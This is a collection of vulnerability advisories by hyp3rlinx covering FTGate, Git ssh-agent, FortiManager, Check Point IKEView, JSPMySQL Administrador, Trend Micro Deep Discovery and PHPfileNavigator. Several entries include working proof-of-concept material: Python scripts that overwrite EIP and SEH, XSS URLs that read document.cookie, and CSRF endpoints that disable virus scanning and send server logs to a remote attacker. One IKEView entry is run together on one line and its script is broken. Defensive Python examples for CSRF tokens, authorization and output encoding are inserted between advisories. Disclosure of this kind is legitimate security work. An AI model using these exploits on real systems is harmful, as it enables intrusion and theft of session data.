Exploitation Technique:
===
Local

by hyp3rlinx
FTGate 2009 Build 6.4.00 CSRF Vulnerabilities
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt

Vendor:
www.ftgate.com

Product:
FTGate 2009 SR3 May 13 2010 Build 6.4.00

Vulnerability Type:
===
Cross site request forgery (CSRF)

CVE Reference:
===
N/A

Vulnerability Details:
===
Multiple CSRF vectors exist within FTGate 2009 that allow us to add arbitrary remote domains, disable antivirus scanning for various Email file attachment types, and finally change settings to have archived server logs sent to our remote attacker controlled server for safe keeping.

Exploit code(s):
===
CSRF(s):

function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}

1) add arbitrary domains:
http://localhost:8089/webadmin/mailboxes/index.fts?action=save; method="post">

2) sends archived logs to arbitrary remote server:
http://localhost:8089/webadmin/config/archive.fts?action=save; method="post">

3) disable virus scan for .jar or .exe files etc:
Options to control handling of virus scanning for email attachments. Virus Scanning Mode: operating mode of the virus scanner; mode=0 to Disable Virus Scanning.
http://localhost:8089/webadmin/filters/virus.fts; method="post">

Disclosure Timeline:
===
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure

Exploitation Technique:
===
Remote

Severity Level:
===
High

Description:
===
Request Method(s): [+] POST
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build 6.4.00
Vulnerable Parameter(s): [+] domadd, extarcserver & mode

by hyp3rlinx
Git-1.9.5 ssh-agent.exe Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt

Vendor:
git-scm.com

Product:
Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319

Vulnerability Type:
===
Buffer Overflow

CVE Reference:
===
N/A

Vulnerability Details:
===
Git Windows SVN ssh-agent.exe is vulnerable to a buffer overflow. Under the cmd dir in Git there is a start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is a local attack vector: if the "start-ssh-agent.cmd" file is replaced with a specially crafted malicious '.cmd' file we cause a buffer overflow, and code execution may become possible.

The faulting module seems to be msys-1.0.dll

File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
---
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax= ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=1DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B

Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite the EBP register.
@ 972 bytes KABOOM! we control EIP.

Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax 0x -1
ecx 0x680a4c3a 1745505338
edx 0x680a4c3a 1745505338
ebx 0x28f90c 2685196
esp 0x28f884 0x28f884
ebp 0x41414141 0x41414141
esi 0x28f8fc 2685180
edi 0x2660 9824
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43

POC code(s):
===
The Python script below creates a malicious 'start-ssh-agent.cmd' file that is renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory; once run it causes a buffer overflow and overwrites EIP. Save the following as ssh-agent-eip.py or whatever, run the script to generate the new malicious '.cmd' file and run it!

import struct,os,shutil

#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#==

file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "
x=open(file,"w")
eip="A"*4
payload+="B"*968+eip #968 filler bytes + 4 bytes of 'A' land in EIP at offset 972
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")

print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "\n"

Disclosure Timeline:
===
Vendor Notification: August 10, 2015
Sept 26, 2015 : Public Disclosure

Exploitation Technique:
===
Local

Description:
===
Vulnerable Product: [+] Git-1.9.5-preview20150319.exe

by hyp3rlinx
FortiManager v5.2.2 Multiple XSS Vulnerabilities
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt

Vendor:
www.fortinet.com

Product:
FortiManager v5.2.2

FortiManager is a centralized security management appliance that allows you to centrally manage any number of Fortinet Network Security devices.

Vulnerability Type:
===
Multiple Cross Site Scripting ( XSS ) in FortiManager GUI
http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui

CVE Reference:
===
Pending

Vulnerability Details:
===
The Graphical User Interface (GUI) of FortiManager v5.2.2 is vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities. 2 potential XSS vectors were identified:
* XSS vulnerability in SOMVpnSSLPortalDialog.
* XSS vulnerability in FGDMngUpdHistory.

The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to one reflected XSS vulnerability and one stored XSS vulnerability. 2 potential XSS vectors were identified:
* XSS vulnerability in sharedjobmanager.
* XSS vulnerability in SOMServiceObjDialog.

Affected Products
XSS items 1-2: FortiManager v5.2.2 or earlier.
XSS items 3-4: FortiManager v5.2.3 or earlier.

Solutions:
===
No workarounds are currently available. Update to FortiManager v5.2.4.

Exploit code(s):
===
1- Persistent:
https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615=18446744073709551615==3=0=ems=167=0=ALL=167=167_w=1=189=0=50
alert(666)

2- Reflected:
https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E

Disclosure Timeline:
===
Vendor Notification: August 4, 2015
September 24, 2015 : Public Disclosure

Exploitation Technique:
===
Remote & Local

Severity Level:
===
Medium (3)

Description:
===
Request Method(s): [+] GET
Vulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier
Vulnerable Parameter(s): [+] vdom, textarea field
Affected Area(s): [+] sharedobjmanager, SOMServiceObjDialog

by hyp3rlinx
Microsoft Exchange Information Disclosure
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MS-EXCHANGE-INFO-DISCLOSURE.txt

Vendor:
www.microsoft.com

Product:
Microsoft Exchange Outlook Web

Vulnerability Type:
===
Information Disclosure

CVE Reference:
===
CVE-2015-2505
http://www.securitytracker.com/id/1033495

Vulnerability Details:
===
Microsoft Exchange Outlook Web Access Lets Remote Users Obtain Potentially Sensitive Information

Fix Available: Yes
Vendor Confirmed: Yes
Version(s): 2013 SP1, 2013 Cumulative Update 8, 2013 Cumulative Update 9

A remote user can obtain potentially sensitive information on the target system. Outlook Web Access (OWA) does not properly handle web requests. A remote user can send a specially crafted request to the target web application to view potentially sensitive stack trace information on the target system [CVE-2015-2505].

Exploit code(s):
===
N/A

Disclosure Timeline:
===
Vendor Notification: April 10, 2015
Sept 8, 2015 : Public Disclosure

by hyp3rlinx
IKEView.exe R60 Stack Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt

Vendor:
www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe

Product:
===
IKEView.exe Feature Pack NGX R60 - Build 59104

IKEView.exe is used to inspect internet key exchange (IKE) phase 1 & 2 packets exchanged between the firewall and switches and gateways. IKEView is a Checkpoint Partner tool available for VPN troubleshooting purposes. It is a Windows executable that can be downloaded from Checkpoint.com. This file parses the IKE.elg file located on the firewall.

To use IKEView for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following: vpn debug ikeon
   This will create the IKE.elg file located in $FWDIR/log
2. Attempt to establish the VPN tunnel. All phases of the connection will be logged to the IKE.elg file.
3. SCP the file to your local desktop. WinSCP works great.
4. Launch IKEView and select File>Open. Browse to the IKE.elg file.

Vulnerability Type:
===
Stack Buffer Overflow

CVE Reference:
===
N/A

Vulnerability Details:
===
IKEView.exe is vulnerable to a local stack based buffer overflow when parsing a malicious (internet key exchange) ".elg" file. The vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after IKEView parses our malicious file, which may then result in arbitrary attacker supplied code execution.

0018F868 |41414141
0018F86C |01FC56D0 ÐVü ASCII "File loaded in 47 minutes, 00 seconds."
0018F870 |41414141
0018F874 |41414141 Pointer to next SEH record
0018F878 |42424242 SE handler
0018F87C |0002 ...

Quick Buffer Overflow POC :
===
1) Below python file to create the POC; save as .py, it will generate the POC file, open it in IKEView.exe and KABOOM!

seh="B"*4 #<--will overwrite SEH with a bunch of 42's, HEX for the 'B' ASCII char.
file="C:\\IKEView-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4428+seh #4428 filler bytes + 4 bytes of 'B' reach the SEH record at 4432
x.write(payload)
x.close()

print "\n===\n"
print " IKEView-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=\n"

Exploitation Technique:
===
Local

Severity Level:
===
High

Description:
===
Vulnerable Product: [+] IKEView.exe Feature Pack NGX R60 - Build 59104
Vulnerable File Type: [+] .elg
Affected Area(s): [+] Local OS

by hyp3rlinx
IKEView.exe Fox beta 1 Stack Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt Vendor: www.checkpoint.com Product: IKEView.exe Fox beta 1 IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall phase(1 & 2) packets being exchanged with switches and gateways. Vulnerability Type: == Stack Buffer Overflow CVE Reference: == N/A Vulnerability Details: = IKEView.exe is vulnerable to local stack based buffer overflow when parsing an malicious (internet key exchange) ".elg" file. Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after IKEView parses our malicious file, which may result then result in arbitrary attacker supplied code execution. quick GDB register dump: EAX ECX 41414141 EDX 7774B4AD ntdll.7774B4AD EBX ESP 0018E0E0 EBP 0018E100 ESI EDI EIP 41414141 C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 1 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () ---SEH Chain- 0:000> !exchain 0018f870: 42424242 Invalid exception stack at 41414141 0:000> 0018f870: 42424242 Invalid exception stack at 41414141 0:000> 0018F868 |02004AE0 àJ. ASCII "File loaded in 08 minutes, 01 seconds." 0018F86C |41414141 0018F870 |41414141 Pointer to next SEH record 0018F874 |42424242 SE handler Quick Buffer Overflow POC : === 1) Below python file to create POC save as .py it will generate POC file, open in IKEView.exe and KABM! seh="B"*4 #<--will overwrite SEH with bunch of 42's HEX for 'B' ASCII char. file="C:\\IKEView-buffer-overflow.elg" x=open(file,"w") payload="A"*+seh x.write(payload) x.close() print "\n===\n" print " IKEView-buffer-overflow.elg file created\n" print " hyp3rlinx ..." 
print "=\n"

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Description:
============
Vulnerable Product: [+] IKEView.exe Fox beta 1
Vulnerable File Type: [+] .elg
Affected Area(s): [+] Local OS

by hyp3rlinx
JSPMySQL Administrador CSRF & XSS Vulnerabilities
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt

Vendor:
=======
JSPMySQL Administrador
https://sites.google.com/site/mfpledon/producao-de-software

Product:
========
JSPMySQL Administrador v.1 is a remote administration tool for MySQL databases that are on a Web server, using JSP technology.

Vulnerability Type:
===================
CSRF & XSS

CVE Reference:
==============
N/A

Vulnerability Details:
======================
1) No CSRF token exists, allowing remote attackers to run arbitrary SQL commands on the MySQL database.

2) An XSS entry point exists on the listaBD2.jsp web page, opening up the application for client side browser code execution.

In either case get the victim to visit our malicious webpage or click on our malicious linx then KABOOM!!!

Exploit code(s):
================
1- CSRF to drop the default MySQL database on the remote server:

JSP-MYSQL-ADMIN-CSRF
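The first finding above is the absence of any CSRF token on state-changing requests. As an added example, not code from the JSPMySQL Administrador project, the following Python shows the synchronizer-token pattern that closes that gap: a token bound to the user's session with an HMAC, with a validity window, checked in constant time before any SQL action is accepted. The server secret, the session ids and the request dict are constructed for the example; `handle_admin_action` is a hypothetical stand-in for the JSP page that executes the submitted SQL.

```python
import hashlib
import hmac
import time
from typing import Optional, Tuple

# Constructed secret for the example; a real deployment loads it from protected config.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"
TOKEN_MAX_AGE = 3600  # seconds a token stays valid


def _mac(session_id: str, issued_at: int, secret: bytes) -> str:
    """HMAC-SHA256 over 'session_id|issued_at', hex encoded."""
    msg = f"{session_id}|{issued_at}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str, issued_at: Optional[int] = None,
                     secret: bytes = SERVER_SECRET) -> str:
    """Token to embed in each form: '<issued_at>.<HMAC(session_id|issued_at)>'.

    Binding the token to the session id means a token obtained for one
    session is useless when replayed against another."""
    ts = int(time.time()) if issued_at is None else issued_at
    return f"{ts}.{_mac(session_id, ts, secret)}"


def verify_csrf_token(session_id: str, token: Optional[str], now: Optional[int] = None,
                      max_age: int = TOKEN_MAX_AGE, secret: bytes = SERVER_SECRET) -> bool:
    """Accept only a well-formed, unexpired token whose MAC matches this session.

    The comparison uses hmac.compare_digest so a wrong token cannot be
    distinguished from a right one by timing."""
    if not token or "." not in token:
        return False
    ts_str, mac = token.split(".", 1)
    if not ts_str.isdigit():
        return False
    ts = int(ts_str)
    now = int(time.time()) if now is None else now
    if ts > now or now - ts > max_age:      # future-dated or stale token
        return False
    return hmac.compare_digest(_mac(session_id, ts, secret), mac)


def handle_admin_action(request: dict, session_id: str,
                        now: Optional[int] = None) -> Tuple[int, str]:
    """Gate for a state-changing endpoint such as the SQL console.

    `request` is a constructed dict standing in for the HTTP request:
    {'method': 'POST', 'form': {'sql': ..., 'csrf_token': ...}}.
    A cross-site forged request has no way to include a valid token, so it
    is rejected before the SQL is looked at."""
    if request.get("method") != "POST":
        return 405, "state-changing actions must use POST"
    form = request.get("form") or {}
    if not verify_csrf_token(session_id, form.get("csrf_token"), now=now):
        return 403, "missing or invalid CSRF token"
    return 200, "accepted"


if __name__ == "__main__":
    sid = "sess-A"                      # constructed session id
    tok = issue_csrf_token(sid)
    forged = {"method": "POST", "form": {"sql": "SELECT 1"}}          # no token
    legit = {"method": "POST", "form": {"sql": "SELECT 1", "csrf_token": tok}}
    print("forged request:", handle_admin_action(forged, sid))
    print("legit request: ", handle_admin_action(legit, sid))
```

The token must travel in the form body (or a custom header), never in a cookie alone: the browser attaches cookies to cross-site requests automatically, which is exactly what makes the original page forgeable. Setting the session cookie with `SameSite=Lax` or `Strict` is a complementary layer, not a replacement for the check.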
Trend Micro Deep Discovery Authentication Bypass
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-0818.txt

Vendor:
=======
www.trendmicro.com

Product:
========
Trend Micro Deep Discovery 3.7.1096

Vulnerability Type:
===================
Authentication Bypass

CVE Reference:
==============
CVE-2015-2873

Vulnerability Details:
======================
http://esupport.trendmicro.com/solution/en-US/1112206.aspx
http://www.kb.cert.org/vuls/id/248692

Trend Micro Deep Discovery Threat Appliance version 3.7.1096

Certain Deep Discovery Inspector URLs including the system log and whitelist/blacklist are accessible to a non-administrator user because the pages do not properly check for authorization. An unauthenticated user without administrator privileges may thus gain access to and modify certain system configuration settings.

Several URLs, including the system log, whitelist, and blacklist, are accessible to a non-administrator user by direct request. The pages do not properly check for authorization.

Impact:
=======
An authenticated user without administrator privileges may access and modify certain system configuration settings.

Exploit code(s):
================
N/A

Disclosure Timeline:
====================
Vendor Notification: March 26, 2015
August 18, 2015 : Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s): [+] GET
Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096
Vulnerable Parameter(s): [+] syslog, whitelist, blacklist
Affected Area(s): [+] Trend Micro Deep Discovery

by hyp3rlinx
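The root cause above is pages that are reachable by direct request without an authorization check of their own. As an added illustration in Python, and not Trend Micro's code, the following shows the deny-by-default pattern a fix enforces at one choke point rather than page by page: every route must appear in a policy table with the roles allowed to reach it, authentication ("is there a session?") and authorization ("does the session's role permit this page?") are checked separately, and the path is canonicalized before the lookup so aliases of the same page cannot slip past. The route names are modelled on the syslog/whitelist/blacklist pages the advisory names; the policy table, the `Session` type and the role names are assumptions for the example.

```python
import posixpath
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional, Tuple


@dataclass(frozen=True)
class Session:
    user: Optional[str]          # None means no authenticated user
    roles: FrozenSet[str]


# Constructed policy: canonical path -> roles allowed. Anything absent is denied.
# The page names follow the advisory; the role model is an assumption.
ROUTE_POLICY: Dict[str, FrozenSet[str]] = {
    "/dashboard": frozenset({"viewer", "admin"}),
    "/syslog":    frozenset({"admin"}),
    "/whitelist": frozenset({"admin"}),
    "/blacklist": frozenset({"admin"}),
}


def normalize(path: str) -> str:
    """Canonical form for the policy lookup.

    Drops the query string, collapses '.', '..' and repeated slashes, removes
    a trailing slash and lower-cases, so '/dashboard/../SysLog/?x=1' and
    '/syslog' are the same key. The leading '/' is re-added after lstrip so
    posixpath.normpath never sees a '//' prefix, which it would preserve."""
    bare = path.split("?", 1)[0]
    return posixpath.normpath("/" + bare.lstrip("/")).lower()


def authorize(path: str, session: Optional[Session]) -> Tuple[int, str]:
    """Single enforcement point run before any page handler.

    Order matters: unknown routes are refused outright, then authentication,
    then role authorization. A page that forgets to register itself is
    unreachable instead of silently open."""
    canonical = normalize(path)
    allowed = ROUTE_POLICY.get(canonical)
    if allowed is None:
        return 404, "unknown route (deny by default)"
    if session is None or session.user is None:
        return 401, "authentication required"
    if not (session.roles & allowed):
        return 403, f"roles {sorted(session.roles)} not permitted on {canonical}"
    return 200, "ok"


if __name__ == "__main__":
    viewer = Session("alice", frozenset({"viewer"}))     # constructed users
    admin = Session("root", frozenset({"admin"}))
    for who, sess in (("anonymous", None), ("viewer", viewer), ("admin", admin)):
        for p in ("/syslog", "/dashboard/../whitelist", "//BlackList/?id=1"):
            print(f"{who:9} {p:28} -> {authorize(p, sess)}")
```

The normalization step is the part most often missing from a quick fix: if each page checks `request.path == "/syslog"` against the raw request, the same handler may still be reached under a slightly different spelling. Web frameworks generally do this canonicalization for you when the check is placed in routing middleware, which is where it belongs.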
Trend Micro Deep Discovery XSS
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-081815b.txt

Vendor:
=======
www.trendmicro.com

Product:
========
Trend Micro Deep Discovery 3.7.1096

The Trend Micro Deep Discovery platform enables you to detect, analyze, and respond to today's stealthy, targeted attacks in real time. It may be deployed on a network as an appliance.

Vulnerability Type:
===================
Cross Site Scripting (XSS)

CVE Reference:
==============
CVE-2015-2872

Vulnerability Details:
======================
http://esupport.trendmicro.com/solution/en-US/1112206.aspx
http://www.kb.cert.org/vuls/id/248692

Deep Discovery Inspector is vulnerable to XSS attacks that could allow an unauthenticated user to execute malicious content.

On some legacy browsers like IE 7 with a low Security Level, Deep Discovery Inspector is vulnerable to XSS that allows an unauthenticated user to execute malicious content through the index.php

The widget implementation is vulnerable to XSS that allows an unauthenticated user to execute malicious content.

Exploit code(s):
================
https://localhost/widget/index.php?menuUrl=1&contentUrl='%25;alert('XSS+By+hyp3rlinx+\nMarch+2015')//

Disclosure Timeline:
====================
Vendor Notification: March 26, 2015
August 18, 2015 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Description:
============
Request Method(s): [+] GET
Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096
Vulnerable Parameter(s): [+] contentURL
Affected Area(s): [+] Trend Micro Deep Discovery

by hyp3rlinx
PHPfileNavigator 2.3.3 Persistent Reflected XSS
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt

Vendor:
=======
pfn.sourceforge.net

Product:
========
PHPfileNavigator v2.3.3 (pfn) is a state-of-the-art, open source web based application to completely manage your files and folders.

Vulnerability Type:
===================
Persistent Reflected XSS

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form: nome, usuario, email etc...

We can leverage the existing CSRF vulnerability to update a victimz profile and store a malicious XSS payload, or a malicious user can inject their own payloads when updating their profilez, affecting other users and the security of the whole application.

Multiple reflected XSS exists as well for the following PHP pages, all with the same vulnerable parameter 'dir' when issuing GET requests. The pfn-2.3.3 application seems to filter out script tags etc, but we can bypass this using DIV onMouseMove= JS functions!

navega.php
accion.php
preferencias.php

Tested using xampp-1.7.0

Exploit code(s):
================

Persistent XSS:
---------------
POST URL: http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=

e.g. Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email' field and click the Accept button.

Injecting XSS into the 'name' field will store the XSS payload in the pfn MySQL database in the 'pfn_usuarios' table, in the 'nome' column. The same fate will happen for the other injected fields 'email' and 'usuario'.
Reflected XSS:
--------------
1) http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir= DIV onMouseMove= alert(document.cookie) /a
2) http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir= DIV onMouseMove= alert(document.cookie) /a
3) http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir= DIV onMouseMove= alert(document.cookie) /a

Disclosure Timeline:
====================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure

Severity Level:
===============
Medium

Description:
============
Request Method(s): [+] POST / GET
Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)
Vulnerable Parameter(s): [+] nome, usuario, email, dir
Affected Area(s): [+] Admin

by hyp3rlinx
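The 'dir' reflection here, and the widget contentUrl reflection in the Trend Micro Deep Discovery XSS advisory above, share one cure: encode the reflected value for the context it lands in, instead of blacklisting tags. The advisory notes that pfn strips script tags yet an element with an event-handler attribute goes straight through, which is the generic failure of any tag blacklist. This added Python example, not pfn's or Trend Micro's code, puts a script-tag-stripping filter of that kind next to HTML entity encoding and runs both over payloads modelled on the advisory's; the `render_dir_heading_*` helpers and the `is_active_markup` check are constructed for the demonstration, not real pfn pages.

```python
import html
import re

# Payloads modelled on those in the advisory (constructed for the example).
SCRIPT_PAYLOAD = "<script>alert(666)</script>"
HANDLER_PAYLOAD = '<DIV onMouseMove="alert(document.cookie)">'

# Matches opening/closing <script> tags only: the kind of blacklist the advisory bypasses.
_SCRIPT_TAG = re.compile(r"</?\s*script[^>]*>", re.IGNORECASE)
# Heuristic for "would still execute": a <script> tag or any element carrying an on* handler.
_ACTIVE_MARKUP = re.compile(r"<\s*script|<\s*[a-z][^>]*\bon[a-z]+\s*=", re.IGNORECASE)


def blacklist_filter(value: str) -> str:
    """Tag-stripping 'sanitizer': removes <script> tags and nothing else.

    Every other element, and every event-handler attribute, survives."""
    return _SCRIPT_TAG.sub("", value)


def escape_for_html(value: str) -> str:
    """Output encoding for an HTML text or attribute context.

    '<', '>', '&', '"' and "'" become entities, so whatever the string
    contains is rendered as characters and never parsed as markup."""
    return html.escape(value, quote=True)


def is_active_markup(fragment: str) -> bool:
    """True when the fragment still contains a <script> tag or an on* handler.

    A regex stands in for a browser here; it is enough to show the contrast."""
    return _ACTIVE_MARKUP.search(fragment) is not None


def render_dir_heading_vulnerable(dir_param: str) -> str:
    """Reflects the 'dir' parameter after the blacklist only (the pattern the advisory bypasses)."""
    return f"<h2>Directory: {blacklist_filter(dir_param)}</h2>"


def render_dir_heading_fixed(dir_param: str) -> str:
    """Reflects the same parameter with context-appropriate output encoding."""
    return f"<h2>Directory: {escape_for_html(dir_param)}</h2>"


def compare(payloads=(SCRIPT_PAYLOAD, HANDLER_PAYLOAD)) -> dict:
    """Map each payload to (active after blacklist?, active after encoding?)."""
    return {
        p: (is_active_markup(render_dir_heading_vulnerable(p)),
            is_active_markup(render_dir_heading_fixed(p)))
        for p in payloads
    }


if __name__ == "__main__":
    for payload, (after_blacklist, after_escape) in compare().items():
        print(f"{payload!r}")
        print(f"  still active after blacklist: {after_blacklist}")
        print(f"  still active after encoding:  {after_escape}")
```

The script-tag payload is neutralized by both approaches, but the event-handler payload passes the blacklist untouched and only the encoder stops it. Entity encoding is the right tool for an HTML text or quoted-attribute context; a value reflected into a JavaScript string (the `contentUrl` case, where the payload closes the quote with `'` and continues with `;alert(...)//`) needs a JavaScript-string encoder instead, and a value used as a URL needs URL encoding, so the encoder is chosen per output context rather than once per application.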